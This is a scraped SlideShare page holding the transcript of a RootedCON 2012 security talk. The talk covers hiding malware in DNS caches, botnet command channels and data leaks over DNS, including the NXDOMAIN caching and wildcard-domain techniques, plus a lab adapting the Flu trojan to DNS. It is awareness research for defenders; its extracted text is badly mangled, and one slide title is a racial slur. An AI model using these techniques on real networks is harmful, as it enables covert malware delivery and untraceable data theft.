Your SlideShare is downloading. ×
0
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]

1,108

Published on

“DNS: Internet Dial-Tone”; Partiendo de esta premisa y con la vista puesta en el método de distribución de ‘malware’ presentado en 2011 (Cloud Malware Distribution), intentaremos mostrar de forma …

“DNS: Internet Dial-Tone”; Partiendo de esta premisa y con la vista puesta en el método de distribución de ‘malware’ presentado en 2011 (Cloud Malware Distribution), intentaremos mostrar de forma dinámica los resultados obtenidos después de algunos meses de trabajo focalizado en las comunicaciones, tanto en la parte de control como en la fuga de información, de las ‘botnets’. Por supuesto con el protocolo DNS con un papel protagonista. Jugaremos con tres parámetros fundamentales que tendremos que equilibrar:

Nivel de exposición de la infraestructura del atacante.
Recursos y complejidad.
Ancho de banda en la comunicación.
El objetivo final es concienciar de la importancia de poner el foco en este protocolo como se ha hecho en otros. Nuestros resultados, y los resultados obtenidos por proveedores de seguridad e investigadores en los últimos meses avalan la posición que defendemos.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,108
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. CMD:%Look%who’s%talking%too% DNS:%a%botnet%dialect%
  • 2. Francisco%J.%Gómez%Rodríguez%(fran@Gd.es):%•  Computer%Engineering%(EUIMUPM)%•  Security%Research%(Telefonica%R&D)%•  dig$fran.rootedcon.themafia.info$TXT$Carlos%Díaz%Hidalgo%(charlie@Gd.es):%•  TelecommunicaGons%Engineer%(ETSITMMUPM),%GPEN,%GCIH,% OPST,%ITILF%and%CCNA.%•  Technology%Specialist%in%Ethical%Hacking%(Telefonica%R&D)%•  dig$charlie.rootedcon.themafia.info$TXT$
  • 3. look$who’s$talking$too$Nasal%Spray%This$presenta9on$contains:$one%year%ago%…………………………………………....%%%%3%mg%cloud%malware%distribuGon%…………………..….%%%10%mg%dns%is%in%the%air%…………………………………………%%%10%mg%suspicion%………………………………………………….%%%%%8%mg%data%leak%………………………………………………….%%%10%mg%laboratory%……………………………………………….%%%%10%mg% 4.4$FL$OZ$(130mL)$ Tamper;Evident:%Do%not%accept%if%sealed%blister% unit%has%been%broken%or%opened% THIS%PACKAGE%FOR%HOUSEHOLDS% WITHOUT%YOUNG%CHILDREN%
  • 4. INTRODUCTION$
  • 5. One%year%ago%…%•  We%talked%about%DNS%and%Malware.%•  We%released%Cloud%Malware%DistribuGon% (CMD):% –  An%alternaGve%method%for%malware%distribuGon% using%Cache%DNS%services.% –  Using%client%default%DNS%se_ngs.% –  Malware%source%virtually%untraceable.%
  • 6. A%DNS%shot%
  • 7. Cloud%Malware%DistribuGon%in%a%nutshell%CMD$
  • 8. Cloud%Malware%DistribuGon%1.  Encoding:%Split%malware%payload%into%DNS%Records.% %2.  Publishing:%Publish%domain%and%each%record%in%a%public%Name%Server.% %3.  Loading:%Force%an%Open%Emi`er%DNS%Cache%Server%to%store%all%records.% %4.  Downloading:%Download%records%from%an%infected%host%(bot).% %5.  Decoding:%Rebuild%malware%payload%from%records.% 8rjqerkjqet.cmdns.domain.com1% ueirytbdosu.cmdns.domain.com1% ktqtr53xase.cmdns.domain.com1% kzmfzzmfzze.cmdns.domain.com1% 8rjqerkjqet.cmdns.domain.com1% 1,2% ueirytbdosu.cmdns.domain.com1% 3% 4% 5 ktqtr53xase.cmdns.domain.com1% kzmfzzmfzze.cmdns.domain.com1% Open%Emi`er% DNS%
  • 9. Encoding%&%Publish% Cloud%Malware%DistribuGon%(I)% 8rjqerkjqet.cmdns.domain.com1% 8rjqerkjqet1 ueirytbdosu.cmdns.domain.com1% ueirytbdosu1 ktqtr53xase1 ktqtr53xase.cmdns.domain.com1% kzmfzzmfzze1% kzmfzzmfzze.cmdns.domain.com1% •  From%malware%file%we%create% a%base32%coded%string.% •  So%we%split%the%string%into% DNS%compliance%records.% DNS%AUTH% 8rjqerkjqetueirytbdosuktqtr53xasekzmfzzmfzze1% Freedns.afraid.org% 8rjqerkjqet.cmdns.domain.com1% kzmfzzmfzze.cmdns.domain.com1% ueirytbdosu.cmdns.domain.com1% ktqtr53xase.cmdns.domain.com1%
  • 10. Cloud%Malware%DistribuGon(II)% 8rjqerkjqet.cmdns.domain.com1%•  We%upload%each%DNS%record%from% a%malicious%DNS%to%Open%Emi`er.% ueirytbdosu.cmdns.domain.com1%•  This%is%made%by%requesGng%each% ktqtr53xase.cmdns.domain.com1% record%to%Open%Emi`er%DNS.%•  Then%Server%caches%each%record.% kzmfzzmfzze.cmdns.domain.com1% Split[1..n].cmdns.domain.com% A?% 8rjqerkjqet.cmdns.domain.com1% Open% ueirytbdosu.cmdns.domain.com1% Emi`er% ktqtr53xase.cmdns.domain.com1% cmdns.domain.com% DNS%AUTH% NS?% DNS% kzmfzzmfzze.cmdns.domain.com1%Freedns.afraid.org% Loading%
  • 11. Cloud%Malware%DistribuGon%(III)% •  Since%the%Open%Emi`er%Server%has%cached%all%records%we% convert%it%into%a%domain%authoritaGve%domain%server.% •  From%now%on,%Open%Emi`er%will%resolve%all%domain%queries.% •  Thus,%all%Internet%DNS%servers%can%resolve%malware%records%and% bots%can%get%them.% DNS%AUTH% % % %Freedns.afraid.org%8rjqerkjqet.cmdns.domain.com1% Open%ueirytbdosu.cmdns.domain.com1%ktqtr53xase.cmdns.domain.com1% Emi`er%kzmfzzmfzze.cmdns.domain.com1% DNS% Downloading%
  • 12. Cloud%Malware%DistribuGon%(IV)% kzmfzzmfzze.cmdns.domain.com1% ktqtr53xase.cmdns.domain.com1% ueirytbdosu.cmdns.domain.com1% 8rjqerkjqet.cmdns.domain.com1% 8rjqerkjqetueirytbdosuktqtr53xasekzmfzzmfzze1% •  With%all%the%retrieved%records%bots% can%rebuild%the%original%file.%% •  Bot%has%now%updated%the%malware% file.%Decoding%
  • 13. %Own%survey%:%yesterday%and%today% Febrero$de$2011$ Marzo$de$2012$ España% EEUU% España% EEUU% Queried%hosts% 10.406% 10.406% 8217% 8217% Replying%hosts% 87,22%% 87,39%% 87,58%% 87,69%% Open%resolvers% 76,46%% 77,28%% 95,45%% 82,08%% Open%emi`ers% 57,76%% 57,33%% 53,78%% 53,51%%Accept%+norecurse% queries% 55,91%% 55,49%% 87,67%% 74,44%% TTL%≥%604800% 43,05%% 42,94%% 51,24%$ 49,32%$
  • 14. A%quick%test…% DNSCrypt$In% the% same% way% the% SSL% turns% HTTP% web% traffic%into% HTTPS% encrypted% Web% traffic,% DNSCrypt%turns% regular% DNS% traffic% into% encrypted% DNS%traffic% that% is% secure% from% eavesdropping% and%manMinMtheMmiddle%a`acks.%%
  • 15. …%a%quick%demo.%Summary:%We%can%use%DNSCrypt%and%CMD%Method%works.%%
  • 16. DNS:%yesterday,%today,%and%tomorrow%DNS$IS$IN$THE$AIR$
  • 17. Are%you%talking%to%me?%•  Let’s%see%some%about…% –  DNS%as%covert%channel.% –  DNS%uses%in%malware%communicaGons.%
  • 18. l% DNS%as%Covert%Channe%%•  OzymanDNS%(Kaminsky)%•  Dnscapy%•  (NSTX)%Iodine:%Use%several%RR%types,% NULL,TXT,CNAME)%•  Dns2tcp%&%TCPMoverMDNS:%relay%TCP%connecGons.%•  LoopcVPN%One%of%ChinaMTelecom%Hotspot% nightmare.%
  • 19. Are%you%talking%to%me?%•  Let’s%see%some%about…% –  DNS%as%covert%channel.% –  DNS%uses%in%malware%communicaGons.%
  • 20. Stateless%malware%(I)%•  TSPY_ZBOT.SMQH –  Another Modified ZeuS Variant Seen in the Wild. –  Reported in September 2011 by Trendmicro. –  Data exchange is also now happening in UDP. –  http://blog.trendmicro.com/another-modified-zeus-variant-seen-in-the-wild/
  • 21. Stateless%malware(II)%•  Older&version&using&TCP&to&exchange&configura7on&files.&However,& The&new&version&exchanges&all&data&in&UDP –  http://www.symantec.com/connect/blogs/zeusbotspyeye-p2p-updated-fortifying-botnet
  • 22. Stateless%malware(II)%•  Older&version&using&TCP&to&exchange&configura7on&files.&However,& The&new&version&exchanges&all&data&in&UDP –  http://www.symantec.com/connect/blogs/zeusbotspyeye-p2p-updated-fortifying-botnet TCP%
  • 23. Where%theres%smoke,%theres%fire.%
  • 24. Feedorbot%•  Using DNS protocol. –  Feedorbot share encrypted commands from C&C. –  Encapsuling data in TXT records and Base64 encoded. –  http://www.cj2s.de/On-Botnets-that-use-DNS-for-Command-and-Control.pdf
  • 25. HiloG%•  Thanks%DNS%querys%HiloG%monitors%infected%host%status.% –  h`p://blog.forGnet.com/hiloGMtheMbotmasterMofMdisguise% ! 142625.bc7a3d45.01.0AC1FD9D62074E6D9D2889088284DAB5.n.empty.1148.empty. 5_1._t_i.ffffffff.explorer_exe.173.rc2.a4h9uploading.com%•  Although%It%uses%DNS%as%control%protocol,%bots%download% update%files%from%“file%hosGng”%servers%by%HTTP.%% !
  • 26. Morto%•  From IRC to DNS. –  Morto, like Feedorbot, uses TXT records to comnunicate. –  http://www.symantec.com/connect/blogs/morto-worm-sets-dns-record
  • 27. GATHERING$&$EVALUATING$INFORMATION$
  • 28. Gathering%&%EvaluaGng%InformaGon%(I)%•  h`p://www.wombatMproject.eu/%%•  h`p://exposure.iseclab.org/index.html%%
  • 29. Gathering%&%EvaluaGng%InformaGon%(II)%•  h`ps://dnsdb.isc.org/#Home%%•  h`p://www.webboar.com%%
  • 30. Gathering%&%EvaluaGng%InformaGon%(III)%•  Don´t%forget%the%classics:% –  h`p://www.robtex.com/%
  • 31. Learned%in%#Rooted2012%•  h`p://labs.alienvault.com/labs/index.php/projects/openMsourceMipMreputaGonMportal/%%
  • 32. SomeGmes%…%I%see%dead%people% •  September,%2011% %%%%(Top%10%Malicious%Domains)%
  • 33. Scratch%&%Win%
  • 34. Ten%Li`le%Niggers%•  h`p://www.webboar.com/ip/67.15.149.70/% –  25%Domain(s)%on%IP%Address%67.15.149.70% •  azxdf.com% •  civiGcle0.com% •  morewallfalls7.com% •  mjuyh.com% •  ckubf.com% •  okjyu.com% •  hjuyv.com% •  djhbw.com% •  orn2hcb.com% •  plokm.com% •  himovingto8.com% •  qlovg.com% •  nbgtr.com% •  hiuxd.com% •  quiluGon2.com% •  vcxde.com% •  liunj.com% •  uncdt.com% •  asljd.com% •  loijm.com% •  xvfar.com% •  bruGllor5.com% •  mjrth.com% •  zscdw.com% •  zukamosion3.com%
  • 35. SomeGmes%…%I%see%dead%people%
  • 36. CMD%could%be%alive!%
  • 37. DATA$LEAK$OVER$DNS$
  • 38. DATA$LEAK$OVER$DNS$
  • 39. TradiGonal%data%leak%using%DNS% [OUTPUT_DOMAIN]1 DataLeakRecord1.[OUTPUT_DOMAIN] DataLeakRecord11 DataLeakRecord2.[OUTPUT_DOMAIN] DataLeakRecord21 …! 1% 2% Cache%DNS% (public or private) DNS%Auth.% OUTPUT_DOMAIN% Bot
  • 40. Using%a%DNS%reflector% DNS%Auth.% DataLeakRecord1.[OUTPUT_DOMAIN] (OUTPUT_DOMAIN)% 2% 1% (PUBLICATION_DOMAIN)! Cache%DNS% !Data1!R>!DataLeakRecord1 (public or private) 3% Force%Data%Leak%Upload% CMD$ 5%Bot Data1 [PUBLICATION_DOMAIN]1 Data11 4% Data21 …! Data1.[PUBLICATION_DOMAIN] Cache%DNS% DNS%Auth.% (Open%emi`er%+%cache)% PUBLICATION_DOMAIN% !Data1!R>!DataLeakRecord1
  • 41. DNS%reflector%(demo)%
  • 42. Using%FastMFlux%DNS%reflectors% DNS%Auth.% DataLeakRecord1.[OUTPUT_DOMAIN] (OUTPUT_DOMAIN)% 2% 1% Cache%DNS% (PUBLICATION_DOMAIN)! !Data1!R>!DataLeakRecord1 (public or private) 3%DataLeakRecord1.[OUTPUT_DOMAIN] Force%Data%Leak%Upload% CMD$ 5% Bot Data1 [PUBLICATION_DOMAIN]1 Data11 4% Data21 …! Data1.[PUBLICATION_DOMAIN] Cache%DNS% DNS%Auth.% (Open%emi`er%+%cache)%
  • 43. Data%Leak%using%NXDOMAIN%responses%•  NXDOMAIN%responses%are%cached:% –  NegaGve%caching%is%useful.% –  TTL%value:%The%SOA%minimum%parameter%is%used% as%the%negaGve%(NXDOMAIN)%caching%Gme% (defined%in%RFC%2308).%•  Other%queries%may%reuse%some%parts%of%the% lookup%(quick%response).%
  • 44. Caching%NXDOMAIN%responses%(I)%%
  • 45. Caching%NXDOMAIN%responses%(II)%%
  • 46. Caching%NXDOMAIN%responses%(III)%%
  • 47. Data%leak%with%“dig”% RCODE$ TTL$ QUERY$TIME$
  • 48. Leak%recovery%with%“dig”%(I)% TTL$<$86400$ QUERY$TIME$<$300$msec$
  • 49. Leak%recovery%with%“dig”%(II)% TTL$=$86400$ QUERY$TIME$approx.$300$msec$ It$is$not$a$good$method$for$recovery!$
  • 50. Leak%recovery%with%“dig”%(III)% TTL$<$86400$ QUERY$TIME$<$300$msec$
  • 51. Leak%recovery%with%“dig”%(IV)% RCODE$≠$NXDOMAIN$ QUERY$TIME$<$300$msec$ It$is$the$preferred$method$for$recovery!$
  • 52. Data%Leak%using%NXDOMAIN%responses% DNS% 2% 1% (Open%emi`er%+%cache)% DNS%Auth.% UT_DOM AIN] 1.[OUTPUT_DOMAIN] (OUTPUT_DOMAIN)% 1.[OUTP d1.[OUTPUT_DOMAIN] OMAIN] TPUT_D d1.[OU … AIN] dataleakrecord1 UT_DOM rd1.[OUTP ataLeakRecord1.[OUTPUT_DOMAIN] … DataLeakRecord1.[OUTPUT_DOMAIN] IN] T_DOMA d1.[OUTPU krecor atalea MAIN] PUT_DO rd1.[OUT akreco datale Bot
  • 53. Data%Leak%using%NXDOMAIN%responses% DNS% 2% 1% (Open%emi`er%+%cache)% DNS%Auth.% UT_DOM AIN] 1.[OUTPUT_DOMAIN] (OUTPUT_DOMAIN)% 1.[OUTP d1.[OUTPUT_DOMAIN] OMAIN] TPUT_D d1.[OU … AIN] dataleakrecord1 UT_DOM rd1.[OUTP ataLeakRecord1.[OUTPUT_DOMAIN] … DataLeakRecord1.[OUTPUT_DOMAIN] IN] T_DOMA d1.[OUTPU krecor atalea MAIN] PUT_DO rd1.[OUT akreco a1.[OUTPUT_DOMAIN] datale 1.[OUTPUT_DOMAIN] z.[OUTPUT_DOMAIN] b.[OUTPUT_DOMAIN] a.[OUTPUT_DOMAIN] … … Bot QUERY:%+norecurse% % 3% RESPONSE:%RCODE?% dataleakrecord1 TTL%value?% Query%Gme?%
  • 54. NXDOMAIN%(demo)%
  • 55. Data%Leak%using%“nice”%domains%•  There%are%authoritaGve%DNS%server%that:% –  Simply%point%all%unknown%DNS%queries%to%a%single% IP%address.% –  Minimum%TTL%value%on%the%order%of%1M7%days.%•  Where%can%I%find%them?% inbox.com% imgur.com% –  Alexa%“Tops%Sites”:% motherless.com% h`p://www.alexa.com/topsites%% wikia.com% wikispaces.com% pbworks.com% %%%%%%%%%%%%…%
  • 56. Caching%‘nice’%responses%(II)%%
  • 57. Caching%‘nice’%responses%(II)%%
  • 58. Data%Leak%using%‘nice’%domains% DNS% 2% ‘nice’%DNS%Auth.% 1% (Open%emi`er%+%cache)% (OUTPUT_DOMAIN)% AIN] 1.[OUTPUT_DOMAIN] UT_DOM 1.[OUTP d1.[OUTPUT_DOMAIN] OMAIN] TPUT_D d1.[OU … AIN]dataleakrecord1 UT_DOM rd1.[OUTP ataLeakRecord1.[OUTPUT_DOMAIN] … DataLeakRecord1.[OUTPUT_DOMAIN] IN] T_DOMA d1.[OUTPU krecor atalea MAIN] PUT_DO rd1.[OUT akreco datale Bot
  • 59. Data%Leak%using%‘nice’%domains% DNS% 2% ‘nice’%DNS%Auth.% 1% (Open%emi`er%+%cache)% (OUTPUT_DOMAIN)% AIN] 1.[OUTPUT_DOMAIN] UT_DOM 1.[OUTP d1.[OUTPUT_DOMAIN] OMAIN] TPUT_D d1.[OU … AIN]dataleakrecord1 UT_DOM rd1.[OUTP ataLeakRecord1.[OUTPUT_DOMAIN] … DataLeakRecord1.[OUTPUT_DOMAIN] IN] T_DOMA d1.[OUTPU krecor atalea MAIN] PUT_DO rd1.[OUT akreco a1.[OUTPUT_DOMAIN] datale 1.[OUTPUT_DOMAIN] z.[OUTPUT_DOMAIN] b.[OUTPUT_DOMAIN] a.[OUTPUT_DOMAIN] … … Bot QUERY:%+norecurse% % 3% ANSWER%SECTION?% dataleakrecord1 TTL%value?%
  • 60. Conclusions%dataMleak% Use$client$ Upload$ Expose$ Download$ Score$ default$DNS$ queries$ cybercrime$ queries$ (0;10)$ seings$ needed$ infrastructure$ needed$ TradiGonal% YES% 2%queries/kB% YES$ M% 5%DNS%tunneling%Using%FastMFlux% YES% 2%queries/kB% YES$ 2%queries/kB% 4%DNS%reflectors% Using% NXDOMAIN% NO$ 2$queries/B$ NO% 20%queries/B% 2% response% Using%“nice”% NO$ 2$queries/B$ NO% 20%queries/B% 6% domains%
  • 61. ToDo:%Improvement++%•  Data%Leak%using%‘nice’%domains.%But$ remembering$that:$ –  Must%use%client%default%DNS%se_ngs.%•  Maybe%can%use%three%party%resources%…%(once% again)% –  %…%Use%misconfigured%DNS%(proxy%DNS,%cache%DNS,% authoritaGve%server,%…).% –  e.g.%must%ignore%“+norecurse”%flag,%“minimalM response”%configured,%etc.%•  Result:%Untraceable%data%leaks%
  • 62. Harder%than%finding%a%needle%in%a% haystack!%
  • 63. Are%we%infected?%LABORATORY$
  • 64. Making%the%lab.%•  We%need%a%“real”%threat…%•  But%we%are%“ethical”…%•  And%we%are%not%developers…% Searching…$
  • 65. And%the%winner%is…%•  Wri`en%in%C#%and%PHP%•  GNU/GPL%•  Geared%to%build%botnets%•  HTTP%communicaGon%
  • 66. How%Flu%works%•  Flu%server%share%XML%commands%file.%•  Infected%hosts%get%XML%file%through% HTTP%request.% HTTP$ Flu% Flu% Infected% SERVER% Host%
  • 67. Flu%and%CMD%•  We%use%CMD%to%distribute%XML%commands%file.%•  Our%dream:%Flu%become%stateless%Trojan.%•  Then%we’ll%have%statelessMTrojanMGPL%botnet.% 1%GET% 1%query% 11%pkts.% HTTP/TCP% Vs% DNS/UDP% 2%pkts.% 1%conn.% % 0%conn.% DNS$ Open% DNS$ Flu% Flu% Emi`er% Infected% DNS% DNS% Host%
  • 68. Flu%and%CMD:%Server%•  PHP%5.3.0%or%higher%required.%•  Three%steps:% 1.  &domain.db%file%create.%(external%lib:%Tar.php)% 2.  Load%XML%file%into%DNS%server.%(NaGve%lib)% 3.  Download%data%from%infected%host.%(NaGve%lib)%
  • 69. Flu%and%CMD:%3th%Party%•  ISC%Bind%•  FreeDNS.afraid.org%•  HE%free%DNS%service%•  Misconfigured%DNS%server.% Open% Emi`er%
  • 70. Flu%and%CMD:%3th%Party%•  ISC%Bind%•  FreeDNS.afraid.org%•  HE%free%DNS%service%•  Misconfigured%DNS%server.% Open% Emi`er%
  • 71. Flu%and%CMD:%Client% •  We%use%ARSoD.Tools.Net%library.% •  Without%GUI%changes:% –  We%use%domainload&to%data%leak.% –  We%use%domaindownload&to%get%XML%file.%
  • 72. Flu%and%CMD:%How%it%works%(I)%XML2DNS$ LOADXML$ DOWNLOADXML$ DNS$ Open% DNS$ Flu% Flu% Emi`er% Infected% DNS% DNS% Host%
  • 73. Flu%and%CMD:%How%it%works%(II)% •  How%flu%call%back?% –  NXDOMAIN%can:%Track%new%bots.% –  NXDOMAIN%can’t:%Send%huge%files.%% DNS$ Open% DNS$ Flu% Flu% Emi`er% Infected% C&C% Nxdomainquery% Nxdomainquery% Noerror% DNS% Noerror% Host%DNS%Server%
  • 74. Flu%and%CMD:%How%it%works%(II)% 1.  How%flu%call%back?% –  NXDOMAIN%can:%Track%new%bots.% –  NXDOMAIN%can’t:%Send%huge%files.%% 2.  Then…%we%need%to%expose%DNS%server.% DNS$ Open% DNS$ Flu% Flu% Emi`er% Infected% C&C% Nxdomainquery% Nxdomainquery%1% Noerror% DNS% Noerror% Host% DNS%Server% DNS$ DNS$ Flu% Flu% Cache%2% Infected% DNS% DNS% Host%
  • 75. Flu%and%CMD:%Demo%
  • 76. Conclusions%•  DNS%is%a%botnet%dialect…% –  One%year%ago%DNS%was%a%possibility,%today%could%be%a%real% threat.%•  Data%leak%using%DNS%need%an%improvement…% –  ...but%we%are%working%progress.%•  Malware%need%to%communicate%undetected,%and%IDS% want%to%detect%malware.% –  Both%must%be%looking%for%the%same…%DNS.%•  Don’t%forget%DNS%Protocol%
  • 77. QuesGons?% Who$invented$the$rootedcon?$Perez$the$mouse$ Rootedcon$is$your$parents$Santa$ Three$Magic$Kings$
  • 78. References%!  h`p://code.kryo.se/iodine/%%!  h`p://dns.measurementMfactory.com/%%!  h`p://darkwing.uoregon.edu/~joe/secprof10Mdns/secprof10Mdns.pdf%%%!  h`p://www.blackhat.com/presentaGons/bhMeuropeM05/BH_EU_05MKaminsky.pdf%%!  h`p://www.blackhat.com/presentaGons/bhMusaM04/bhMusM04Mkaminsky/bhMusM04Mkaminsky.ppt%%!  h`p://www.pcworld.com/arGcle/220024/feds_accidentally_seize_84000_innocent_domains_link_them_with_child_porn.html%%%!  h`p://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf%%%!  h`p://www.secdev.org/projects/scapy/%%!  h`ps://www.isc.org/soÉware/bind/documentaGon/arm95#man.dig%%!  h`p://dns.measurementMfactory.com/cgiMbin/openresolvercheck.pl%%%!  h`p://hakin9.org/magazine/1652MmobileMmalwareMtheMnewMcyberMthreat%%!  h`p://www.ieÑ.org/rfc/rfc{1033,1034,1035,1183,2181}.txt%%!  h`p://tools.ieÑ.org/id/draÉMcmdMpreventMmalwareMdnsMdistributeM00.txt%%%!  h`p://www.wombatMproject.eu/%%!  h`p://exposure.iseclab.org/index.html%%!  h`ps://dnsdb.isc.org/#Home%%%!  h`p://www.webboar.com%%!  h`ps://dns.he.net/%%!  h`p://www.fluMproject.com/%%!  h`p://arsoÉtoolsnet.codeplex.com/%%
  • 79. Thanks%for%your%Gme!% @{Hlexpired,ffranz}& {charlie,fran}@7d.es%

×